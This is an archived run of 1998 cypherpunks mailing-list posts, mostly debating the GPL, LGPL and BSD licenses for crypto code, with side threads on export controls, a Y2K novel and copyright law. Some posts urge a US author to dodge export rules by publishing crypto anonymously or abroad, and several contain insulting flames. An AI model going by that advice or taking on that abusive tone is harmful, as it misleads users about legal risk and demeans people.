From: Adam Back <aba@dcs.ex.ac.uk>
Date: Mon, 28 Sep 1998 18:44:08 +0800
To: ravage@einstein.ssz.com
Subject: Re: GPL & commercial software, the critical distinction
In-Reply-To: <199809282229.RAA03186@einstein.ssz.com>
Message-ID: <199809282345.AAA23109@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Jim Choate writes:
> It has been asserted that the use of GNU code within a project causes that
> product to be GPL'ed and as a result the GPL is not commercialy viable.
> 
> This is an incorrect interpretation.
> 
> The GPL does say that if you use GPL'ed code in your project then the
> project is GPL'ed, it does NOT say that if you make function calls into a
> GPL'ed library that the product is GPL'ed. 

There are two distinct licenses promoted by the FSF.  They are the GNU
GPL (General Public License) and the GNU LGPL (Library General Public
License).

As you suggest the LGPL is usuable.

However Werner Koch's GNUPG (OpenPGP implementation) uses GPL (not
LGPL) -- or at least it did in version 10-0.0.0, which is the source
tree I have here.

So the comment was on Werner's license, and use of GPL in general for
crypto code, which started this discussion when he offered that it
contained a GPLed Twofish implementation, when Bruce Schneier asked if
anyone had Public Domain implementations in various languages.  (Not
matching Bruce's PD requirement, note).

> This distinction makes fully commercial and source-secure products
> within the GPL infrastructure possible and feasible.

I did make this distinction in my 2nd post on this topic:

: (There is a difference between GNU and GNU Library.  GNU library allows
: you to use a library without infecting your entire software.  GNU
: library is sort of usable.)

Yes.  My point is to highlight for those writing crypto code with the
aim of crypto deployment NOT to use GPL, but preferably (in my view)
PD, BSD, or lastly LGPL.

I went on to suggest half-seriously a "cypherpunk license" which
restricted use of the code to code without government back doors.

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Mon, 28 Sep 1998 19:08:38 +0800
To: ulf@fitug.de
Subject: Toto -- mimic function or the real thing (Re: no subject)
In-Reply-To: <m0zNfGX-0003b7C@ulf.mali.sub.org>
Message-ID: <199809290009.BAA23670@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Ulf Moeller writes:
> Toto? writes:
> >  Blanc and Carroll watched in total amazement as
> >Jim Choate's ludicrous/inane computer and business theories
> >seemed to be somehow transformed, by unseen hands working
> >behind the scenes, into fully functional and viable
> >RealWorld(TM) concepts, in Choate's work with the Armadillo
> >Group.
> 
> Huh? Is Toto back?

Dunno, but that sure looks like authentic Toto doesn't it (and the
rest of the long post of which excerpt quoted above).  Either someone
has a very high quality mimic function for his writing style, or is
rather good at imitating his writing style manually, or Toto is still
around, and Toto isn't Carl Johnson.

Who knows, if it is Toto, he has been rather careful not to sign
anything recently :-).

(If he were to sign things it might be helpful for Carl
Johnson... Toto?)

Adam
-- 
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@nowhere.to>
Date: Mon, 28 Sep 1998 11:35:13 +0800
To: cypherpunks@toad.com
Subject: Re: Virus for UNIX
In-Reply-To: <19980926171206.958.rocketmail@send103.yahoomail.com>
Message-ID: <d0f1b671f3489052809132b7999ac8d1@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



On Han Solo <apocalipsisx@yahoo.com> wrote:
>Hello!!!
>
>Somebody can tell me about a site where I can find virus for UNIX
>systems.
>
>I need them please!!!!!!!!!

Short answer: see long answer

Long answer: this isn't the list to discuss those.  Anyway, what could
you possibly want with a unix virus?  YOU ARE running windows, right? <G>

----
Message from: "SPAM-ME-NOT" <nobody@nowhere.to>
Mailer: "Telnet <HOST> 110 || Telnet <HOST> 25" - THE REAL WAY!
Quote: lu ml! blf'er qrplqrq gurh grcg!


___________________________________________________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Mon, 28 Sep 1998 21:20:50 +0800
To: ravage@EINSTEIN.ssz.com
Subject: Re: cypherpunk license: PLEASE STEAL ME (Re: GPL & commercial software, the critical distinction) (fwd)
In-Reply-To: <199809290114.UAA04026@einstein.ssz.com>
Message-ID: <199809290222.DAA24938@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Jim Choate writes:
> > OK, but it would seem to me that to interpret GPL in this way is in
> > violation of the spirit (and probably legal intent if interpreted by a
> > lawyer).
> 
> Actualy this situation is specificaly addressed in the LGPL in regards
> header files and how they are the gray area in all this and probably
> indefensible in a court (it says this in the LGPL go look...www.gnu.org).

Yes, I know, I have read LGPL a few times, and it does include the
sorts of exceptions you describe.  But I said GPL, and GPL is the
license which I was suggesting causes problems.  As I said, LGPL is
sort of useable.

> Actualy you missed the obvious way to distribute commercial code and the
> (L)GPL will protect your propietary work....
> 
> In both licenses it is very specific in noting that a L/GPL'ed work that is
> subsumed in another causes that work to become L/GPL'ed by default. 

Right, this is the major sticking point for commercial people I find.

> It further notes that there is NO implication that the use of
> commercial code/libraries in a L/GPL'ed work can be construed to
> L/GPL that proprietary code.

Yes, but the more interesting, less restrictive case is where they
really want to modify the code.  cf the example I gave of say adding
pgp5 compatibility to pgp26ui.

I think that if you modify to any significant extent a GPL peice of
software, and try to sell it you could run into problems.  Your legal
bill for trying to work out how bad it is will be expensive.  If the
company is not that bothered about adding crypto, they are going to
see the implications in lawyer hours alone, and give up before they
start.

> How I do jobs for my customers is that I develop my programs and
> libraries I want to protect via copyright and then distribute them
> with a set of scripts and makefiles that during install build the
> end product.

If you want to be creative, you could do what you want to it ignoring
the license, then provide a binary patch from their binary to your
binary.  Or whatever.  Commercial lawyers are cautious animals though,
so because you could theoretically hack around things does not mean
that some company's lawyer is going to recommend that they do it.

Simpler, rather than hack around, and have the additional hurdle to
crypto deployment of many lawyer hours spent wrangling over
implications of GPL and hacks around it, is to discourage use of GPL
for crypto libraries, and software.

> So the end user can enjoy the privileges of the L/GPL'ed code (ie
> can fix bugs and relink the libraries to their hearts content) 

That aspect of LGPL (availability of source) is useful to the extent
that it encourages people to make source of the crypto parts
available.

> It is quite commen today for commercial houses to use gcc/egc to
> develop and distribute fully commercial code, the catch is that none
> of the end resultant code can come from L/GPL'ed sources.

Use of GNU development tools is a different, and more straight forward
issue than using GNU licensed code.

> [hack around GPL problems using pipes]

The point remains: the simplest and best thing to do about licenses if
you are more concerned about crypto deployment than source
availability is not to use GPL, and probably to avoid LGPL also.

Use BSD, use PD, either is better than GPL for the purpose.

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@remailer.ch>
Date: Tue, 29 Sep 1998 00:05:08 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Remailers, PGP, and a Project Suggestion
Message-ID: <19980929051529.13737.qmail@hades.rpini.com>
MIME-Version: 1.0
Content-Type: text/plain



>        So, what you are saying is that you want crypto to protect yourself
>from government intrusion, but are unwilling to actually WRITE the code for
>fear that the government will lock you up.

That's about right. I will write the code for myself. I will not release it
since I'm in the U.S. and it gives the thugs one more reason to come after
me. That job is better suited for somebody who is outside the U.S. or is
actually willing to sit through a long grand jury investigation, possible
indictment, trial, conviction, jail time, and life as a convicted felon.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Tue, 29 Sep 1998 07:29:54 +0800
To: ignition-point@majordomo.pobox.com
Subject: Re: IP: The virtual president
In-Reply-To: <199809290021.RAA15032@netcom13.netcom.com>
Message-ID: <Pine.GSO.3.95.980929052735.28385C-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain



I enjoy reading WorldNetDaily and all that, but it's a far cry from "the
mainstream media."

Sign me,

A reporter in the mainstream media

Time Inc.
Washington, DC


> 
> From: Jean Staffen <jstaffen@flash.net>
> Subject: IP: The virtual president
> Date: Fri, 25 Sep 1998 22:22:11 -0500 (CDT)
> To: ignition-point@majordomo.pobox.com
> 
> This is the most INCREDIBLE article.  I never thought I'd read something
> like this in the mainstream media!!! -Jean
> 
> 
>                    The virtual president=20
>                  =20
> 
>                    By Missy Kelly=20
>                    Copyright 1998, WorldNetDaily.com=20
> 
>                    "You know, by the time you become the leader of a
>                    country, someone else makes all the decisions." -- Bill
>                    Clinton September 4, 1998=20
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Tue, 29 Sep 1998 00:12:55 +0800
To: cypherpunks@cyberpass.net
Subject: Toto -- mimic function or the real thing (Re: no subject)
Message-ID: <199809290514.HAA24812@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Adam Back writes:

>Who knows, if it is Toto, he has been rather careful not to sign
>anything recently :-).
>
>(If he were to sign things it might be helpful for Carl
>Johnson... Toto?)

He could have been one of the guys sending the insults to the spammers
(which I applaud, mind you) and who got into that argument with Paul Meril,
but the wording isn't anywhere near what we've come to expect from Toto. The
two gay sex responses to one of the Six Degrees of Spam users sounds just
like something he might do.

If Toto has been here all along, I think this is one of the most clever
hoaxes which has hit the list in a long time.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Soren <sorens@workmail.com>
Date: Tue, 29 Sep 1998 07:08:28 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Superterrorism
In-Reply-To: <199809282332.TAA26652@camel8.mindspring.com>
Message-ID: <3610CAF7.42A2CB6C@workmail.com>
MIME-Version: 1.0
Content-Type: text/plain



Good analysis, but conventional and poor conclusions.  In the words of
Baba Re-bop,  "If
you want to get kids off drugs (or CBW) ... Simple, improve reality"

John Young wrote:

> The Fall issue of Foreign Policy has an article, "The Great
> Superterrorism Scare," which critiques the national "obsession"
> with the threat of terrorist use of weapons of mass destruction:
>
>    http://jya.com/superterror.htm  (36K)
>
> It examines the reasons for the obsession, who is promoting
> it, who benefits, and what problems it may cause by diverting
> attention and resources away from genuine threats of lesser
> magnitude from religious cults, loners, antitaxers, militias and
> those with raging paranoia against the government.
>
> It's worth noting that the author recommends arrests be
> allowed of suspicious domestic hostiles though there is no proof
> of criminal intent, and that the FBI and CIA be freed from
> limitations on surveilling and investigating US citizens.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Tue, 29 Sep 1998 08:02:57 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: GPL & commercial software, the critical distinction (fwd)
Message-ID: <199809291302.IAA06395@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 29 Sep 1998 08:14:50 -0400
> From: Adam Shostack <adam@homeport.org>
> Subject: Re: GPL & commercial software, the critical distinction (fwd)

> On Mon, Sep 28, 1998 at 07:09:51PM -0500, Jim Choate wrote:
> | 
> | The problem with your interpretation is that in a sense you want your cake and
> | eat it too. In short you want to be able to use somebody elses code in your
> | product without their having a say in how their code is used or receiving a
> | cut of the profits. The GPL/LGPL is specificaly designed to prevent this.
> 
> 
> 	I'll suggest that in a security context, having ones cake and
> eating it too may not be such a bad thing.

Only if you're the author or publisher and your goal is to watch your bank
account grow to exclusion of all else, everybody else gets screwed.

>  If I can develop a
> commercial product with crypto code thats been made available to the
> community, then there is a lower chance the code will contain bogosity 
> in its security critical functions.
> 
> 	The GPL (not the LGPL) specifically prevents this with the
> best of intentions.

Prevents what, releasing commercial code within a L/GPL'ed context? No, it
doesn't. What it does do is *guarantee* that the customer has some chance of
understanding what his code does (it's called code review and is highly
regarded in crypto algorithm analysis circles) and makes sure the original
L/GPL'ed holder has a stake in any commercial ventures the *source* code is
used in.

I'd say that's a win-win for everyone except those who want something for
nothing so they can buy a new expensive do-dad.

I'll say it again, neither the GPL or the LGPL prevent fully commercial
code development. *HOWEVER* to do that within the context *requires* that
the API to your commercial applications be released and available. This is a
good thing. The only objection to releasing an API is to stifle competition,
*THAT* is a bad thing.

The idea from a free-market perspective:

The idea is that while the actual source code is protectable the API is not
so that *fair* competition can be ensured. The whole free-market theory
must exist in a fairly competitive market. In the context of software that
means full and open API's so that alternate but compatible libraries can
exist and the consumer (not the manufacturer, the hallmark of a
competitively impoverished market) can decide which is the most reliable and
stable version.

Had Microsoft, for example, been required to publish their API's by the
market we wouldn't be spending all this effort and money on the current
proceedings. That would be a win-win for everyone (well except Bill who
probably wouldn't be worth a value equivalent to the holdings of 40+M US
citizens combined).

Anyone who objects to published API's is aware their code is trivial and not
worth it's price or their code is written poorly and easily improved upon.

Bottem line, if you believe in a free-market (which requires fair
competition to work and prevent monopolies) and object to releasing your
API's then you're a hypocrit.

Having your cake and eating it too *never* works, except in Wonderland.

There should be no objection to making oneself wealthy, but not at the
expense of others. Let the quality of your product define your reputation,
not your greed. Become the best supplier of niche code there is because the
code is well fast, failure tolerant, and reliable - not because you've
managed to squeeze all potential competitors out.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Tue, 29 Sep 1998 07:23:16 +0800
To: Jim Choate <cypherpunks@EINSTEIN.ssz.com>
Subject: Re: GPL & commercial software, the critical distinction (fwd)
In-Reply-To: <199809290009.TAA03654@einstein.ssz.com>
Message-ID: <19980929081450.A3534@weathership.homeport.org>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, Sep 28, 1998 at 07:09:51PM -0500, Jim Choate wrote:
| 
| The problem with your interpretation is that in a sense you want your cake and
| eat it too. In short you want to be able to use somebody elses code in your
| product without their having a say in how their code is used or receiving a
| cut of the profits. The GPL/LGPL is specificaly designed to prevent this.


	I'll suggest that in a security context, having ones cake and
eating it too may not be such a bad thing.  If I can develop a
commercial product with crypto code thats been made available to the
community, then there is a lower chance the code will contain bogosity 
in its security critical functions.

	The GPL (not the LGPL) specifically prevents this with the
best of intentions.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Tue, 29 Sep 1998 09:29:29 +0800
To: ukcrypto@maillist.ox.ac.uk
Subject: complex mathematical formulae
Message-ID: <3610EC34.4939@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

I hope http://www.jya.com/itl-news.htm enjoys black and white.

"complex mathematical formulae"  aka  pseduomathematics

  Then, in late 1942, the Royal Navy switched codes to the one-time
  pad system. The Nazi tap was lost forever because the
  pad system is unbreakable in both theory as well as practice.
  U-boats could no longer ambush helpless ships like wolves on
  sheep. Convoy after convoy arrived safe and intact, protected in the  
  armor of an unbreakable code system. The U-boats had
  to change tactics. http://www.us.net/softwar/

  Germany used the enigma algorithm and machine.

  Japan used the purple algorithm.

  And look what happened to them!

I hope all of this helps Charles R Smith's business.
http://www.softwar.net/plight.html

Title: Black and White Test of Cryptographic Algorithms




	

	
		
			
				
					Jump to Forum
					Click Image to Jump to Next Article 
					Go to Text Only Print Version 
				
			
			
			Black and White Test
			of Cryptographic Algorithms
			by William H. Payne
			This article requires special formatting.
			Please Click Here to Read
			
				Send This Article to a Friend:
				
					
						
						 
					
						
							Your Name:
					
					
						
							
					
				
				
					 
					
						
							Email Address of your Friend: 
					
					
						
							
					
				
				
					 
					
						
							Your Email address:
					
					
						
							
					
				
				
					 
					 
					 
				
				
					 
					
						
							
					
				
			
			 
			Back to Home Page
			Quick Menu 
			Visit the Button Shop 
			
			
			Interactive Forum
			Black and White Test
			of Cryptographic Algorithms
			
			
			
			
			
			E-mail the Editor
			
			
			
			
			
			
			 
		
	




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Tue, 29 Sep 1998 08:20:05 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Army Plonks (fwd)
Message-ID: <199809291321.IAA06472@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 29 Sep 1998 08:30:38 -0400
> From: John Young <jya@pipeline.com>
> Subject: Army Plonks

> Now that the terrified US Army has axed its Web sites, and 
> NSA and several other mil sites seem inaccessible and
> "temporarily unavailable" this morning, could this portend
> a dual-use of the Internet, a closed one for porkbarrell mil and
> secret gov sweethearts and a sappy infotainment one for civilians 
> to gameboy infofoolery?
> 
> That would be a tri-power-gov implementation of dual-use 
> terror-scare to hide perkbellied privileges of natsec obsession.

It's called milnet and it's been in existance ever since about '83. It
occured when ARPA became DARPA. I was working on a DoD project at UT Austin
at the time.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 29 Sep 1998 07:43:44 +0800
To: cypherpunks@toad.com
Subject: Army Plonks
Message-ID: <199809291237.IAA08647@camel7.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



Now that the terrified US Army has axed its Web sites, and 
NSA and several other mil sites seem inaccessible and
"temporarily unavailable" this morning, could this portend
a dual-use of the Internet, a closed one for porkbarrell mil and
secret gov sweethearts and a sappy infotainment one for civilians 
to gameboy infofoolery?

That would be a tri-power-gov implementation of dual-use 
terror-scare to hide perkbellied privileges of natsec obsession.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Roessler <roessler@guug.de>
Date: Tue, 29 Sep 1998 01:50:16 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Why GNU GPL is bad for crypto deployment
In-Reply-To: <199809282336.AAA23094@server.eternity.org>
Message-ID: <19980929083209.A18725@sobolev.rhein.de>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, Sep 29, 1998 at 12:36:45AM +0100, Adam Back wrote:

> Which is why companies won't touch GNU license stuff with a barge
> pole.

[....]

> Well, it's your code, and you wrote it, so it's your choice: my
> comments are based on the assumption that the author is more
> interested in crypto deployment than in the GNU license virus as a
> means of promoting the availability of source code.

I have to partially object here:  If code is to be used
commercially, lawyers can ask the copyright holders for a different
license, and they may quite well succeed even if the original
distribution was under GPL.

tlr
-- 
Thomas Roessler  74a353cc0b19  dg1ktr  http://home.pages.de/~roessler/
     2048/CE6AC6C1  4E 04 F0 BC 72 FF 14 23 44 85 D1 A1 3B B0 73 C1




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Tue, 29 Sep 1998 10:34:13 +0800
To: cypherpunks@cyberpass.net
Subject: Horde this Book: the first Y2K action novel
Message-ID: <Pine.GSO.3.95.980929083305.25662B-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain





---------- Forwarded message ----------
Date: Tue, 29 Sep 1998 08:01:12 -0700 (PDT)
From: Declan McCullagh <declan@well.com>
To: politech@vorlon.mit.edu
Subject: Horde this Book: the first Y2K action novel






http://cgi.pathfinder.com/netly/0,2326,201980929-14649,00.html

TIME Digital's Netly News
September 29, 1998

   Horde This Book
   By Declan McCullagh (declan@well.com)

   Book Review America's computers crashed on January 1, 2000. Cars won't
   start, planes won't fly, and the military is in shambles. Soldiers of
   unknown origin have seized control of a key high-tech company. China
   is about to invade. The one man who can save Western civilization from
   a Digital Dark Age is Y2K fixmeister Mark Solvang. Mark's problem?
   Well, it happens to be his company those troops took over. What comes
   next is a predictable romp through gun battles, hacking, and
   government intrigue that's sure to satisfy Chuck Norris fans but leave
   anyone else hoping for more.

   [...remainder snipped...]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Albert P. Franco, II" <apf2@ctv.es>
Date: Tue, 29 Sep 1998 02:11:01 +0800
To: cypherpunks@cyberpass.net
Subject: New copyright law coming...
Message-ID: <3.0.3.32.19980929090206.006a37c4@pop.ctv.es>
MIME-Version: 1.0
Content-Type: text/plain




More back room bullshit to screw with us:

<http://www.sjmercury.com/business/center/copyright092698.htm>

This article talks about a new copyright law slithering through congress. 

They're back...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Tue, 29 Sep 1998 02:27:18 +0800
To: cypherpunks@toad.com
Subject: Re: Mailing-List
Message-ID: <199809290719.JAA01547@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Our mailing list is devoted to the intelligent people who are fighting fo
our freedom using crypto.  although you may fall into the category of
enjoying crypto you are obviously stupid and therefore not what this list is
aimed at.  An intelligent person would ot have sent a message to all the
people on the list asking a dumb question.  There are also a number of
hackers on our list and annoying them means flames galore (possibly)  My
advice is to get an aol account where you will be welcomed

At 03:16 AM 9/28/98 , you wrote:
>
>Please email me information about your mailing-list.
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Tue, 29 Sep 1998 02:56:31 +0800
To: cypherpunks@toad.com
Subject: Unix virus
Message-ID: <199809290750.JAA03612@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



aside from the fact that for a virus to correctly write to files on the unix
system you would need to have suffficiant read/write access,  you are
obviously too stupid to be able to accomplish this successfully.  One way to
ruin the system would be with a gun, that  is about the best that you will
be able to do considering your intellect.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Tue, 29 Sep 1998 09:34:02 +0800
To: Jim Choate <cypherpunks@EINSTEIN.ssz.com>
Subject: Re: GPL & commercial software, the critical distinction (fwd)
In-Reply-To: <199809291302.IAA06395@einstein.ssz.com>
Message-ID: <19980929103338.A4370@weathership.homeport.org>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, Sep 29, 1998 at 08:02:29AM -0500, Jim Choate wrote:
| Forwarded message:
| 
| > Date: Tue, 29 Sep 1998 08:14:50 -0400
| > From: Adam Shostack <adam@homeport.org>
| > Subject: Re: GPL & commercial software, the critical distinction (fwd)
| 
| > On Mon, Sep 28, 1998 at 07:09:51PM -0500, Jim Choate wrote:
| > | 
| > | The problem with your interpretation is that in a sense you want your cake and
| > | eat it too. In short you want to be able to use somebody elses code in your
| > | product without their having a say in how their code is used or receiving a
| > | cut of the profits. The GPL/LGPL is specificaly designed to prevent this.
| > 
| > 
| > 	I'll suggest that in a security context, having ones cake and
| > eating it too may not be such a bad thing.
| 
| Only if you're the author or publisher and your goal is to watch your bank
| account grow to exclusion of all else, everybody else gets screwed.

What did I say about not paying for people's work?  I'm perfectly
happy to pay for code, and I prefer to buy open source code; it tends
to be higher quality.  I don't want to have to accept your opinion on
how I should release code along with the code.

| >  If I can develop a
| > commercial product with crypto code thats been made available to the
| > community, then there is a lower chance the code will contain bogosity 
| > in its security critical functions.
| > 
| > 	The GPL (not the LGPL) specifically prevents this with the
| > best of intentions.
| 
| Prevents what, releasing commercial code within a L/GPL'ed context? No, it
| doesn't. What it does do is *guarantee* that the customer has some chance of
| understanding what his code does (it's called code review and is highly
| regarded in crypto algorithm analysis circles) and makes sure the original
| L/GPL'ed holder has a stake in any commercial ventures the *source* code is
| used in.

	You're being intentionally obtuse.  I excluded the L/GPL from
my comments, and you respond to them as if I was discussing the
L/GPL.	Further, I said above that using code thats been reveiwed is
better from a security perspective.

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Tue, 29 Sep 1998 10:29:46 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Meriweather v. Gates
Message-ID: <199809291521.LAA01780@panix7.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



   >   Reply-To: Tim May <tcmay@got.net>
   >
   >   It's an ironic indication of where we are that Bill Gates is being hounded
   >   by the Justice Department, Sun Microsystems, Netscape, Novell, and Ralph
   >   Nader while no one is hounding John Meriwether. In fact, the Federal
   >   Reserve System, nominally nongovernmental (wink wink) just helped to bail
   >   out his firm, Long-Term Capital Management.
   >
   >   Gates, you see, has a non-leveraged investment of $50 billion in Microsoft.
   >   No borrowing, no margin debt, just plain old-fashioned ownership.

And a monopoly that doesn't need a bailout.

   >   Meriwether, on the other hand, started in 1991 and took in money from
   >   speculators. He took the $2.2 billion and borrowed with it, hitting the
   >   $125 B in borrowed assets point. Then he and his rocket scientists
   >   essentially borrowed still more, using this $125 B to leverage $1.25 T. (T
   >   for "trillion.")
   >
   >   Not  bad, going from $2.2 B to $1.25 T, a mere 500-fold increase.

Sheer unmitigated greed on the part of the banks, not knowing or
forcing Meriwether to tell them.

Over leveraging is what caused the Great Depression via the stock market collapse.
---guy

   Gosh, thank goodness they are loosening the bank/brokerage rules...not.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Tue, 29 Sep 1998 07:05:12 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Remailers, PGP, and a Project Suggestion
In-Reply-To: <19980929051529.13737.qmail@hades.rpini.com>
Message-ID: <199809291039.LAA26488@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Anonymous writes:
> >        So, what you are saying is that you want crypto to protect yourself
> >from government intrusion, but are unwilling to actually WRITE the code for
> >fear that the government will lock you up.
> 
> That's about right. I will write the code for myself. I will not release it
> since I'm in the U.S. and it gives the thugs one more reason to come after
> me. That job is better suited for somebody who is outside the U.S. or is
> actually willing to sit through a long grand jury investigation, possible
> indictment, trial, conviction, jail time, and life as a convicted felon.

Ah come on, it isn't that bad.  Just put it on a crypto site with some
dumb revolving password scheme, or give it to someone else to put no
theirs.  It'll be on replay with-in a few hours, if anyone is
interested in the code.

Also you seem happy using remailers, so you could as easily publish
anonymously.

Don't let a few cold war hang-over export regs stifle your crypto
coding creativity!

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Tue, 29 Sep 1998 12:22:02 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: GPL & commercial software, the critical distinction (fwd)
Message-ID: <199809291721.MAA07404@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 29 Sep 1998 10:33:38 -0400
> From: Adam Shostack <adam@homeport.org>
> Subject: Re: GPL & commercial software, the critical distinction (fwd)

> What did I say about not paying for people's work?  I'm perfectly
> happy to pay for code, and I prefer to buy open source code; it tends
> to be higher quality.  I don't want to have to accept your opinion on
> how I should release code along with the code.

Jesus Christ on a stick. Take a fucking chill pill Adam.

That 'you' is the literary you, not you personaly. You (not the literary
you) should seriously consider counseling. Talk about hair-triggered.

If anybody is guilty of demanding people do it 'their way' it's you.

You really need to better understand this inability of yours to seperate
your self-worth as an individual from the ideas you espouse and supposedly
put out for public dialog.

Everybody has stupid idea, if you can't admit that then there's a problem
more serious than having stupid ideas. Everybody makes mistakes everyday,
and if you seriously think you don't then you have found your first mistake
today.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Tue, 29 Sep 1998 12:36:01 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Remailers, PGP, and a Project Suggestion
In-Reply-To: <19980929051529.13737.qmail@hades.rpini.com>
Message-ID: <v0401170cb236c82dbd70@[206.189.103.244]>
MIME-Version: 1.0
Content-Type: text/plain



At 12:15 AM -0500 9/29/98, Anonymous wrote:
>>        So, what you are saying is that you want crypto to protect yourself
>>from government intrusion, but are unwilling to actually WRITE the code for
>>fear that the government will lock you up.
>
>That's about right. I will write the code for myself. I will not release it
>since I'm in the U.S. and it gives the thugs one more reason to come after
>me. That job is better suited for somebody who is outside the U.S. or is
>actually willing to sit through a long grand jury investigation, possible
>indictment, trial, conviction, jail time, and life as a convicted felon.

	Cleanse it of your identity (or start a pseudonym if you need the
ego boost), and get it to hacktic. PD/BSDL/GPL the code, and go.

	Use the tools to "free" yourself.

	If the law is bad, ignore it whenever possible. This is a very
ignorable law.
--
petro@playboy.com----for work related issues. I don't speak for Playboy.
petro@bounty.org-----for everthing else.      They wouldn't like that.
                                              They REALLY
Economic speech IS political speech.          wouldn't like that.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Tue, 29 Sep 1998 06:58:33 +0800
To: cypherpunks@toad.com
Subject: Re: Joe Farah 9/14 (Pppbbbttt)
Message-ID: <199809291142.NAA23043@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Everybody's belief/morals are different.  For instance I take that
last paragraph of yours and laugh at it.  To many americans doing so
would not be immoral because many people don't believe in god.  Your
moral yardstick would be different from mine.  People in the bible
belt have different morals from those in las vegas.  If I had religous
right morals I'd kill myself.


---Richard.Bragg@ssa.co.uk wrote:
>
> >>Almost 60 percent of those polled said they thought Clinton was
fit to be
> >>president. By what standard? That's the trouble. Americans have no
> >>standards -- no unchangeable yardsticks by which they measure
right and
> >>wrong, truth from fiction.
